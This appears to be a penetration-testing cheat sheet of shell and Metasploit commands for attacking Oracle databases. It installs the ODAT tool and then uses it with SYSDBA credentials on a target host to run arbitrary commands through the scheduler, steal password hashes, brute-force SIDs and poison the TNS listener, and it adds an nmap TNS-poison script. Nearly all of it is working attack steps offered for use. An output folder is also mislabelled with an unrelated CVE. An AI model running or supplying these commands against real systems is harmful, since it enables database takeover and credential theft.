$ git clone https://github.com/quentinhardy/odat ~/tools/odat && cd ~/tools/odat
$ git submodule init && git submodule update
$ sudo apt install libaio1 python3-dev alien python3-pip
$ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm
$ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-devel-19.6.0.0.0-1.x86_64.rpm
$ sudo alien --to-deb *.rpm
$ sudo dpkg -i *.deb
$ vi /etc/profile
...
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
...
$ pip3 install cx_Oracle
$ python3 odat.py -h
$ odat dbmsscheduler -s 10.10.13.37 -p 1521 -d <SID> -U sys -P 'Passw0rd!' --sysdba --exec '/usr/bin/python /tmp/1.py'
$ odat passwordstealer -s 10.10.13.37 -p 1521 -d <SID> -U sys -P 'Passw0rd!' --sysdba --get-passwords
$ sudo wget https://gist.githubusercontent.com/JukArkadiy/3d6cff222d1b87e963e7/raw/fbe6fe17a9bca6ce839544b7afb2276fff061d46/oracle-tns-poison.nse -O /usr/share/nmap/scripts/oracle-tns-poison.nse
$ sudo nmap -v -n -Pn -sV --script oracle-tns-poison.nse -oA CVE-2014-0160/nmap/tns-poison -p1521 10.10.13.37
msf > use auxiliary/scanner/oracle/sid_brute
msf > set RHOSTS file:oracle.txt
msf > set THREADS 25
msf > set VERBOSE false
msf > run
$ odat sidguesser -s 10.10.13.37 -p 1521
$ odat tnspoison -s 10.10.13.37 -d <SID> --test-module
$ odat tnspoison -s 10.10.13.37 -d <SID> --poison
